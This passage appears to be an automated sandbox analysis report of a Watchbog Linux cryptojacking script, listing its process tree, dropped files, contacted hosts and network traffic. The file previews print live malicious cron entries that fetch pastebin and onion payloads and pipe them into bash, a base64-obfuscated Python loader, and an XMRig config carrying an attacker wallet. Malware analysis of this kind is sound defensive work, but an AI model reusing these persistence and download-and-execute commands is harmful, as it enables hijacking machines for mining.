    • rm (PID: 19636, Parent: 19147, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /bin/config.json /bin/watchbog
    • bash New Fork (PID: 19637, Parent: 19147)
      • bash New Fork (PID: 19642, Parent: 19637)
      • curl (PID: 19642, Parent: 19637, MD5: 53ea41160209f7801a5d5f07b546a9cd) Arguments: curl -fsSL https://pastebin.com/raw/dXD2Bs0H
    • bash New Fork (PID: 19638, Parent: 19147)
    • base64 (PID: 19638, Parent: 19147, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19689, Parent: 19147)
    • mkdir (PID: 19689, Parent: 19147, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /tmp/.tmpdropoff//dataoutput/
    • bash New Fork (PID: 19690, Parent: 19147)
      • bash New Fork (PID: 19691, Parent: 19690)
      • curl (PID: 19691, Parent: 19690, MD5: 53ea41160209f7801a5d5f07b546a9cd) Arguments: curl -fsSL https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz -o /tmp/.tmpdropoff/rig.tar.gz
    • bash New Fork (PID: 19712, Parent: 19147)
    • tar (PID: 19712, Parent: 19147, MD5: dbc4507f4db5b41f7358b28bce65a15d) Arguments: tar -xzvf /tmp/.tmpdropoff/rig.tar.gz -C /tmp/.tmpdropoff//dataoutput/
      • tar New Fork (PID: 19721, Parent: 19712)
      • gzip (PID: 19721, Parent: 19712, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: gzip -d
    • bash New Fork (PID: 19743, Parent: 19147)
    • mv (PID: 19743, Parent: 19147, MD5: 0cdfdd010d5f4acab64a1d89066c92e9) Arguments: mv /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls /bin/watchbog
    • bash New Fork (PID: 19744, Parent: 19147)
    • rm (PID: 19744, Parent: 19147, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /tmp/.tmpdropoff/
    • bash New Fork (PID: 19749, Parent: 19147)
    • chmod (PID: 19749, Parent: 19147, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 777 /bin/watchbog
    • bash New Fork (PID: 19753, Parent: 19147)
    • nohup (PID: 19753, Parent: 19147, MD5: 3b11bb9dc8a020bb26e3cf5cf1da3cba) Arguments: nohup ./watchbog
    • watchbog (PID: 19753, Parent: 19147, MD5: unknown) Arguments: ./watchbog
    • bash New Fork (PID: 19754, Parent: 19147)
    • sleep (PID: 19754, Parent: 19147, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 15
    • bash New Fork (PID: 19801, Parent: 19147)
      • bash New Fork (PID: 19802, Parent: 19801)
      • ps (PID: 19802, Parent: 19801, MD5: 37339e5441057d422e61e8a471505337) Arguments: ps -fe
      • bash New Fork (PID: 19803, Parent: 19801)
      • grep (PID: 19803, Parent: 19801, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep watchbog
      • bash New Fork (PID: 19804, Parent: 19801)
      • grep (PID: 19804, Parent: 19801, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v grep
      • bash New Fork (PID: 19805, Parent: 19801)
      • wc (PID: 19805, Parent: 19801, MD5: 0d6e0835ddbd0b179ae07b6317c676d4) Arguments: wc -l
    • bash New Fork (PID: 19838, Parent: 19147)
      • bash New Fork (PID: 19839, Parent: 19838)
      • curl (PID: 19839, Parent: 19838, MD5: 53ea41160209f7801a5d5f07b546a9cd) Arguments: curl -fsSL https://pastebin.com/raw/LUN80Hj8
    • bash New Fork (PID: 19849, Parent: 19147)
    • touch (PID: 19849, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch /tmp/.tmpc
    • bash New Fork (PID: 19850, Parent: 19147)
    • sleep (PID: 19850, Parent: 19147, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 30
  • cleanup

Created / dropped Files

/bin/config.json
Process:./watchbog
File Type:ASCII text
Size (bytes):1183
Entropy (8bit):4.286659623437755
Encrypted:false
MD5:D3B1DDBAF0FAA77C317C0DF332C63FC2
SHA1:0D34FDA949A9D508DE0E2EB6834672F55BC4B83D
SHA-256:7C3184B387482C40B25838AD3627FD817E0CEBE4F097178D29446B64BC1E17E0
SHA-512:0680ED31448FCDE464516F8447E7945D3A3DF2B071BDECD549613639A99F0806F02028B43114351A797B46164AA3022697E8AC03C0AD3BE1C200D7F1F96B36FA
Malicious:true
Reputation:low
Preview:{. "algo": "cryptonight",. "api": {. "port": 0,. "access-token": null,. "id": null,. "worker-id": null,. "ipv6": false,. "restricted": true. },. "asm": true,. "autosave": true,. "av": 0,. "background": false,. "colors": false,. "cpu-affinity": null,. "cpu-priority": null,. "donate-level": 1,. "huge-pages": true,. "hw-aes": null,. "log-file": null,. "max-cpu-usage": 100,. "pools": [. {. "url": "pool.minexmr.com:80",. "user": "47k2wdnyyBoMT6N9ho5Y7uQg1J6gPsTboKP6JXfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7.old",. "pass": "x",. "rig-id": null,. "nicehash": false,. "keepalive": false,. "variant": -1,. "enabled": true,. "tls": false,. "tls-fingerprint": null. }. ],. "print-time": 60,. "retries": 5,. "retry-pause": 5,. "safe": false,. "threads": [.
/bin/ftpsdns
Process:/usr/bin/curl
File Type:ASCII text, with very long lines, with no line terminators
Size (bytes):1028
Entropy (8bit):5.620962650757794
Encrypted:false
MD5:90AE88815BEFE7743FC74D363EEE56D6
SHA1:7474FEDDE5E494485AF620606E906F79639A97AF
SHA-256:67B912D342C7A920891D05EDCFA39E0F61EA45762DD1B75646E18B5125BC0493
SHA-512:45A207D382BED85DED98F87B3C7BD5BB5A66BE75E4006590A83B1A410D1362B7977383F00D399719A1C4C07CA36713ACFFEF48BD96CC1DFCC07B6CE9AF59015A
Malicious:true
Reputation:low
Preview:python -c "import base64;exec(base64.b64decode('IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCiMgLSotIGNvZGluZzogdXRmLTggLSotCmZyb20gb3MgaW1wb3J0IHBhdGgsIHN5c3RlbSwgZ2V0dWlkCgpkZWYgR2V0RGVwcygpOgogICAgaWYgbm90IHBhdGguaXNmaWxlKCcvdXNyL2Jpbi93Z2V0Jyk6CiAgICAgICAgc3lzdGVtKCJ5dW0gY2xlYW4gYWxsIikKICAgICAgICBzeXN0ZW0oInl1bSAteSBpbnN0YWxsIHdnZXQiKQogICAgICAgIHN5c3RlbSgiYXB0LWdldCB1cGRhdGUiKQogICAgICAgIHN5c3RlbSgiYXB0LWdldCAteSBpbnN0YWxsIHdnZXQiKQogICAgaWYgbm90IHBhdGguaXNmaWxlKCcvdXNyL2Jpbi9jdXJsJyk6CiAgICAgICAgc3lzdGVtKCJ5dW0gY2xlYW4gYWxsIikKICAgICAgICBzeXN0ZW0oInl1bSAteSBpbnN0YWxsIGN1cmwiKQogICAgICAgIHN5c3RlbSgiYXB0LWdldCB1cGRhdGUiKQogICAgICAgIHN5c3RlbSgiYXB0LWdldCAteSBpbnN0YWxsIGN1cmwiKQoKaWYgZ2V0dWlkKCk9PTA6CiAgICBHZXREZXBzKCkKc3lzdGVtKCIoY3VybCAtZnNTTCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvV0hwWjl0OGV8fHdnZXQgLXEgLU8tIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9XSHBaOXQ4ZSl8YmFzaCIpCnN5c3RlbSgiKGN1cmwgLWZzU0wgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3lWQWVlS1RCfHx3Z2V0IC1xIC1PIC0gaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3lWQWVlS1RCKXxi
/bin/httpntp
Process:/bin/bash
File Type:ASCII text
Size (bytes):251
Entropy (8bit):5.127166124667473
Encrypted:false
MD5:037CD5F038C009615C69177D3E4EC55F
SHA1:8BD1B372D04D746B6CB1D3BCB316D56561B9A723
SHA-256:C9564305899A8DA4B61C06AD53F86B9EC062314933CDB29F27585A9E9BDC1739
SHA-512:C009A944F400DBA5D45AFDBC4F5FC24D058E274B33AB4D4C8192AF8C76D9B4844315EC482A0F1AD8078202C52C274E42570097327730AA38727B5762F2F5568A
Malicious:true
Reputation:low
Preview:(python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash.##.
/etc/cron.d/apache
Process:/bin/bash
File Type:ASCII text, with very long lines
Size (bytes):455
Entropy (8bit):5.230146200081588
Encrypted:false
MD5:5E8CE3D79B23296F6EF7FF1DADE33BE0
SHA1:3C89AFF6E716C3F2BDC005CB9881AF14422073D0
SHA-256:3C2591CCA36F368C06C8C57C139938BB5A8BA3D8309D09BD8EE3AA9D2DFC1C37
SHA-512:15238D11FA0CCCAD7FA98CAE65E98E92A180ABAD661B19FF50676E69F5B3237E606220F6537DA6A074C714244BFB3A9E48DF0D4ECB6457E92C8DC1E600655BDB
Malicious:true
Reputation:low
Preview:*/7 * * * * root (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash.##.
/etc/cron.d/root
Process:/bin/bash
File Type:ASCII text, with very long lines
Size (bytes):455
Entropy (8bit):5.230146200081588
Encrypted:false
MD5:487EB5C09FD171D7865399AA61B00675
SHA1:EC4EBE4544F51BD17D410D4506448FC757FD18A8
SHA-256:07D3FFB888E693E607F6880FBDD8EA3BB1C7139F6E706B72E38095A4A87A4352
SHA-512:919E68BF5E76595E3D5FAF9551316EFFE7B8E8164197A79568F061B1E19CD80F58ED2AF7540454D5D831CD47914079F2D5D0A174E0110F18700BD29ADCD5BA1D
Malicious:true
Reputation:low
Preview:*/3 * * * * root (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash.##.
/etc/cron.d/system
Process:/bin/bash
File Type:ASCII text, with very long lines
Size (bytes):455
Entropy (8bit):5.229068782508681
Encrypted:false
MD5:7EBFDC06C92D0A74407A215A6EDE31CA
SHA1:62F9EA3EF125AA2517E9B5AD881B886CC941506C
SHA-256:5182729F00AD71F1922711F4784CEA1B179E29FFDDA34C8FDF0948FBCE68EE76
SHA-512:198220B64BE635CA1FC7C7A3C3C9A97FA04453A02208A3ECD23981E154A99B2CB41B42A84AE2300A31BDD33F01F35A590908FD6E6CE6D2CF2190570F116F78C3
Malicious:true
Reputation:low
Preview:*/6 * * * * root (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash.##.
/etc/cron.daily/oanacroane
Process:/bin/bash
File Type:ASCII text
Size (bytes):112
Entropy (8bit):4.928465164415504
Encrypted:false
MD5:97043F28E3840399AB34E377F442D99A
SHA1:6F8473D173F1917EDA7AD2C385FBED24631FE218
SHA-256:C72B4C065F2AC0227CD36870A1680AC1E06E72A47A1169C53D60BD9B44B2D01E
SHA-512:C54216A405495C6FE4F443A2C5B2E5508C23F013629B4689BFD6EFD94B6B51101A2A56AB1B7C2AA2E32D3D4B798D841AAE2ABD783D57415B0087BA24EF3E9563
Malicious:true
Reputation:low
Preview:(curl -fsSL https://pastebin.com/raw/KJcZ9HLL||wget -q -O - https://pastebin.com/raw/KJcZ9HLL)| base64 -d |bash.
/etc/cron.hourly/oanacroane
Process:/bin/bash
File Type:ASCII text
Size (bytes):112
Entropy (8bit):4.928465164415504
Encrypted:false
MD5:97043F28E3840399AB34E377F442D99A
SHA1:6F8473D173F1917EDA7AD2C385FBED24631FE218
SHA-256:C72B4C065F2AC0227CD36870A1680AC1E06E72A47A1169C53D60BD9B44B2D01E
SHA-512:C54216A405495C6FE4F443A2C5B2E5508C23F013629B4689BFD6EFD94B6B51101A2A56AB1B7C2AA2E32D3D4B798D841AAE2ABD783D57415B0087BA24EF3E9563
Malicious:true
Reputation:low
Preview:(curl -fsSL https://pastebin.com/raw/KJcZ9HLL||wget -q -O - https://pastebin.com/raw/KJcZ9HLL)| base64 -d |bash.
/etc/cron.monthly/oanacroane
Process:/bin/bash
File Type:ASCII text
Size (bytes):112
Entropy (8bit):4.928465164415504
Encrypted:false
MD5:97043F28E3840399AB34E377F442D99A
SHA1:6F8473D173F1917EDA7AD2C385FBED24631FE218
SHA-256:C72B4C065F2AC0227CD36870A1680AC1E06E72A47A1169C53D60BD9B44B2D01E
SHA-512:C54216A405495C6FE4F443A2C5B2E5508C23F013629B4689BFD6EFD94B6B51101A2A56AB1B7C2AA2E32D3D4B798D841AAE2ABD783D57415B0087BA24EF3E9563
Malicious:true
Reputation:low
Preview:(curl -fsSL https://pastebin.com/raw/KJcZ9HLL||wget -q -O - https://pastebin.com/raw/KJcZ9HLL)| base64 -d |bash.
/etc/crontab
Process:/bin/bash
File Type:ASCII text
Size (bytes):56
Entropy (8bit):3.7574622877813324
Encrypted:false
MD5:BC07B6AB91BCEBE1915028FD89F34572
SHA1:0FCB27267093AF4213825721D848204F51770C33
SHA-256:38F31E56B6E1FDEC1CBFAD2E7CB904A8A1ABE61781FAA624507A4A73DECE3786
SHA-512:40A4C68D743C25BAA4D1E1F11F6DB486D4CC934350B076013717FEB7D947889DBA443971D69786E4C29217E9394EBDBCCBB7987D713916FB9891952A2B178762
Malicious:true
Reputation:low
Preview:0 1 * * * root /bin/httpntp.5 1 * * * root /bin/ftpsdns.
/etc/sedTLJ6tF
Process:/bin/sed
File Type:ASCII English text
Size (bytes):722
Entropy (8bit):4.7770063668556455
Encrypted:false
MD5:8F111D100EA459F68D333D63A8EF2205
SHA1:077CA9C46A964DE67C0F7765745D5C6F9E2065C3
SHA-256:0E5C204385B21E15B031C83F37212BF5A4EE77B51762B7B54BD6AD973EBDF354
SHA-512:D81767B47FB84AAF435F930356DED574EE9825EC710A2E7C26074860D8A385741D65572740137B6F9686C285A32E2951CA933393B266746988F1737AAD059ADB
Malicious:false
Reputation:low
Preview:# /etc/crontab: system-wide crontab.# Unlike any other crontab you don't have to run the `crontab'.# command to install the new version when you edit this file.# and files in /etc/cron.d. These files also have username fields,.# that none of the other crontabs do...SHELL=/bin/sh.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..# m h dom mon dow user.command.17 *.* * *.root cd / && run-parts --report /etc/cron.hourly.25 6.* * *.root.test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ).47 6.* * 7.root.test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ).52 6.1 * *.root.test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ).#.
/etc/seddlpHGC
Process:/bin/sed
File Type:ASCII English text
Size (bytes):722
Entropy (8bit):4.7770063668556455
Encrypted:false
MD5:8F111D100EA459F68D333D63A8EF2205
SHA1:077CA9C46A964DE67C0F7765745D5C6F9E2065C3
SHA-256:0E5C204385B21E15B031C83F37212BF5A4EE77B51762B7B54BD6AD973EBDF354
SHA-512:D81767B47FB84AAF435F930356DED574EE9825EC710A2E7C26074860D8A385741D65572740137B6F9686C285A32E2951CA933393B266746988F1737AAD059ADB
Malicious:false
Reputation:low
Preview:# /etc/crontab: system-wide crontab.# Unlike any other crontab you don't have to run the `crontab'.# command to install the new version when you edit this file.# and files in /etc/cron.d. These files also have username fields,.# that none of the other crontabs do...SHELL=/bin/sh.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..# m h dom mon dow user.command.17 *.* * *.root cd / && run-parts --report /etc/cron.hourly.25 6.* * *.root.test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ).47 6.* * 7.root.test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ).52 6.1 * *.root.test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ).#.
/tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/config.json
Process:/bin/tar
File Type:ASCII text
Size (bytes):941
Entropy (8bit):4.104220312149258
Encrypted:false
MD5:FD4F058613D8196CE4C55071A474554C
SHA1:91758F90E908C16A33D1989E09582EF7461701D6
SHA-256:0F66C7229AA4245940187A2F8BFF8276239C96B26D46985E662FDC2E8CDD12B5
SHA-512:52921DAB5A26EA717A70B0A6C95B884A92A92607140261844DCBDF0522A909F4C37B570F296496732B9B166BB7DDF4DAC5E443150C9A2A74E7697E19E2EE303E
Malicious:false
Reputation:low
Preview:{. "algo": "cryptonight",. "api": {. "port": 0,. "access-token": null,. "id": null,. "worker-id": null,. "ipv6": false,. "restricted": true. },. "asm": true,. "autosave": true,. "av": 0,. "background": false,. "colors": true,. "cpu-affinity": null,. "cpu-priority": null,. "donate-level": 5,. "huge-pages": true,. "hw-aes": null,. "log-file": null,. "max-cpu-usage": 100,. "pools": [. {. "url": "donate.v2.xmrig.com:3333",. "user": "YOUR_WALLET_ADDRESS",. "pass": "x",. "rig-id": null,. "nicehash": false,. "keepalive": false,. "variant": -1,. "tls": false,. "tls-fingerprint": null. }. ],. "print-time": 60,. "retries": 5,. "retry-pause": 5,. "safe": false,. "threads": null,. "user-agent": null,. "watch": true.}
/tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig
Process:/bin/tar
File Type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, from 'x)', stripped
Size (bytes):5249392
Entropy (8bit):6.370382609342636
Encrypted:false
MD5:65CFCAD6DC3D31695B8F3FFA08E5D389
SHA1:CF76429996C82131C3FD8F505C705C1A151C55F4
SHA-256:BB9C62AEFA457D436EBDC82AA36F08955B2CBFDFBBC6394B2E039B9CFFAFACE4
SHA-512:BAADE6F0B989AFBE368E3EE835D653AAA3BF19DCC7A8EF9701F4AF6E27EAC900F1FAD8132BF9C298DB2D45911A7992717AD3B5ACFCF63BE0D92167C796331401
Malicious:true
Reputation:low
Preview:.ELF..............>.....PiL.....@.........P.........@.8...@.".!.........@.......@.@.....@.@.....0.......0.......................p.......p.@.....p.@...............................................@.......@......vL......vL....... ...............L..............................d........ .............h.O.....h.......h....... ....... .................................@.......@.....D.......D.........................L.............................................P.td......C.....................dP......dP..............Q.td....................................................R.td......L.....................p/......p/............../lib64/ld-linux-x86-64.so.2.............GNU............. ...............GNU..z`a.vu....xv;.i..... ..<...............X...B9 A..F3..j..@. 0@... 0..D. ..v.J.......Q.*,..D...A..f.c.....!..........a.@P.j...@.0@V..&Z p]"@..DB...... ..@..L.a. .....+ 6H`.".@.D ..........0..0..`.@.....@...M0 ..........#........ . .a.t......."@Q.. .>.:....A..=]..S.3.h..x9..M. . .,....F....1..$A@..
/tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls
Process:/bin/tar
File Type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, from 'x)', stripped
Size (bytes):2668048
Entropy (8bit):6.42614403541452
Encrypted:false
MD5:95721DE55AD89005484B4C21F768D94E
SHA1:3DE63B309645803503B44A8413C49111F8F569E5
SHA-256:7F52EFD3D2A99475164A9413ED2D1B947129099D67C72583633CEDBC6032F8E5
SHA-512:6BBBC20233B5ECC0FD770EE0B318C1E489828D7BB2D62ABF6D7F86802FEFCD27AB101B2A07C8ABD0CB8AB0AB0BEB03E07C2AFCF74A5C1CF2207B62E8ED211C10
Malicious:true
Yara Hits:
  • Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls, Author: Florian Roth
Reputation:low
Preview:.ELF..............>.......G.....@.........(.........@.8...@.".!.........@.......@.@.....@.@.....0.......0.......................p.......p.@.....p.@...............................................@.......@.....$9(.....$9(....... ..............;(......;.......;.......o................ ...............(...............................................................@.......@.....D.......D........................;(......;.......;..............................P.td.....,$......,d......,d.............................Q.td....................................................R.td.....;(......;.......;.......d.......d............../lib64/ld-linux-x86-64.so.2.............GNU............. ...............GNU..ka....V.EA.b.J..8.........................ZD..A...4P.`..@..(.4. ..(.,.$..X.........[@@Tx..x..h.. .0.....b.....D.....<F"..0...&8.Y.ld..._.H ..B`&...2.(0.............H).f..`3.i...@C..@.c.......... .....@QA...:@.&..C"... ) .HX.L... $......C.@|.(H.P.q!.......@...[.....(@6..%.Q. .....5.!@..............
/tmp/.tmpdropoff/rig.tar.gz
Process:/usr/bin/curl
File Type:gzip compressed data, from Unix, last modified: Thu Mar 07 09:18:52 2019
Size (bytes):3029010
Entropy (8bit):7.992009159328695
Encrypted:true
MD5:B0206C7AA2F36634A43EF3F0FA7944C5
SHA1:FBC1A1A96C8D7CEFC88DCAA1C1393E5C5232B706
SHA-256:B48DDA017B9332A26D0D13EC912C360C3965292731D7EB3A9BFE441CAAE08BB3
SHA-512:47E00F970A9A1A28D49FF1C09E47E5458F430243DC7D7EF16E2EAE7D44CFAF949B614BE3A18063F206A84BFBB8747412B8A28A8C110863650F324A0D3E6446D1
Malicious:false
Reputation:low
Preview:.......\....wT...7pV...E.B.%.h....A.Er..A............D.D..,.b@....J.av..;}9..g.....f..........*.........V..W...E..y..CUY.....r....J^QIIN^..J(9yEy.E.^...............C.|\..C..}..........w..s...9........7XEI..{..U....._YAU....?y........34xx.:.x.......E....yyx..J!K.^...}.......DN.?#'....`...o7?X..........g..A.nA....W@..L..|..v....C..\B.H......k).....E...BC......1.....:;.x{.......r...>.A..?.% T......+$.o..... /..........&......+...3..M:.........v..l.)|.=...|..>.u..&]64...K.r.=......)......w._.B.H....L...........S....?..........t8.ib.k....c.{..?..8...,.....W............S...................Z.s..r.#}...........:.V.5..p...._..n...D......%m....%..._/s..|...^)..D.../..i...?n]0.3.....o3.e.........;..x..y......o_............O...+.+*.).............'..tM.0h4._=.u...l...WO@........J.E..+..@QBO.k....J9..o.E...H...y.....E....]I..g@.[....-Q(...G.W....q....s...1..v..9.......$.-q..........<.y^....Og.~..........C..z.3!.........I..-......]....B............\..e.+.zUe}..U.d}\.}..B#.#.T.U.d..e.......f.......G..
/var/spool/cron/crontabs/root
Process:/bin/bash
File Type:ASCII text, with very long lines
Size (bytes):451
Entropy (8bit):5.253165633199512
Encrypted:false
MD5:34F3AA4682611A11C8EA98D55CFEAC56
SHA1:FDB3056D2763F376B6982012E6AAAFA8F955590E
SHA-256:28F744BAA657C77824D8184DABC3FA3F4A4637C086EE09CCCAF2504E55646B87
SHA-512:E973D10E2BFEA560F5195B05EF69C24ACC0891E1A986B2949D6BCCF2B9856E333B75336AA90669218E729BE290258A3F31A477BAE390442BE5C6C96F2A43A66C
Malicious:true
Reputation:low
Preview:*/11 * * * * (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash.##.
/var/spool/cron/root
Process:/bin/bash
File Type:ASCII text, with very long lines
Size (bytes):450
Entropy (8bit):5.246488050072152
Encrypted:false
MD5:6B1DD92FD674847F3DE51855E0A13F1B
SHA1:E76DA56FD1BE08F2E0FE521454C8CD0ED97EC7EE
SHA-256:743D1420A1A03DA1FD116FBD2832ED7A20985D2F2EBF1BEBC0F936830CFEFD65
SHA-512:2CF0885760BD74969DB490992ACECDA9349F429C756A8E3EE52C2108AE2B5286C6D9D80C0685CF4DE2FB781F6FFCFCCEB38E669D69B6CFAD7C8C795BFC69B773
Malicious:true
Reputation:low
Preview:*/9 * * * * (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash.##.

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s3-1-w.amazonaws.com
54.231.120.203
truefalsehigh
github.com
140.82.118.4
truefalsehigh
pool.minexmr.com
37.59.45.174
truefalsehigh
pastebin.com
104.20.208.21
truefalsehigh
github-production-release-asset-2e65be.s3.amazonaws.com
unknown
unknownfalsehigh

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://pastebin.com/raw/KJcZ9HLL)oanacroane.4.drfalse
    high
    https://pastebin.com/raw/EzqVke6Xsystem.4.drfalse
      high
      https://pastebin.com/raw/4HvzGfGmapache.4.dr, httpntp.4.dr, root.4.dr, root0.4.dr, root1.4.dr, system.4.drfalse
        high
        https://pastebin.com/raw/KJcZ9HLLoanacroane.4.drfalse
          high
          https://aziplcr72qjhzvin.onion.to/old.txtsystem.4.drfalse
            high
            https://pastebin.com/raw/3FDDiNwWsystem.4.drfalse
              high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPCountryFlagASNASN NameMalicious
              37.59.54.205
              France
              16276unknowntrue
              140.82.118.4
              United States
              36459unknownfalse
              54.231.120.203
              United States
              16509unknownfalse
              104.20.208.21
              United States
              13335unknownfalse

              Static File Info

              General

              File type:Bourne-Again shell script text executable
              Entropy (8bit):5.606304569447983
              TrID:
              • Linux/UNIX shell script (7007/1) 100.00%
              File name:AEjyioBcTB
              File size:15565
              MD5:82ee3a6c2e3d53ccf85108a6c644c0b9
              SHA1:1db603370e30234ca2cbd5cd84f5683f76f21513
              SHA256:26ebeac4492616baf977903bb8deb7803bd5a22d8a005f02398c188b0375dfa4
              SHA512:76abdcac7631cf17f69145046048eddeb0d805a89225b06b649cdf23cc928386b1b590a7e3a71d4767a5c5ff36b91b56e15718f39bc9e1ad910cda4c70391c86
              SSDEEP:192:gD4Ih2gySgdK2NzXqUgkLTdNjxrQ050+UIui6RE7Jr2LSZ2Lj2r2LFSfz7+ZEo8m:g8I5gdrzPgkLTdNQdZEXESk76EvP
              File Content Preview:#!/bin/bash.SHELL=/bin/sh.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.#This is the Old-ReBuild Lady job copy.#.#Goal:.# The goal of this campaign is as follows;.#.- To keep the internet safe..#.- To keep them hackers from causing rea

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jul 25, 2019 13:47:01.446321011 MESZ55366443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:01.459085941 MESZ44355366104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:01.459408045 MESZ55366443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:01.609111071 MESZ55366443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:01.621735096 MESZ44355366104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:01.629519939 MESZ44355366104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:01.629568100 MESZ44355366104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:01.629590988 MESZ44355366104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:01.629710913 MESZ55366443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:01.635387897 MESZ55366443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:01.687997103 MESZ44355366104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:01.688252926 MESZ55366443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:01.700689077 MESZ44355366104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:01.700726032 MESZ44355366104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:01.706393957 MESZ55366443192.168.1.100104.20.208.21
              Jul 25, 2019 13:47:01.725888014 MESZ44355366104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:01.725918055 MESZ44355366104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:01.725929022 MESZ44355366104.20.208.21192.168.1.100
              Jul 25, 2019 13:47:01.725940943 MESZ44355366104.20.208.21192.168.1.100
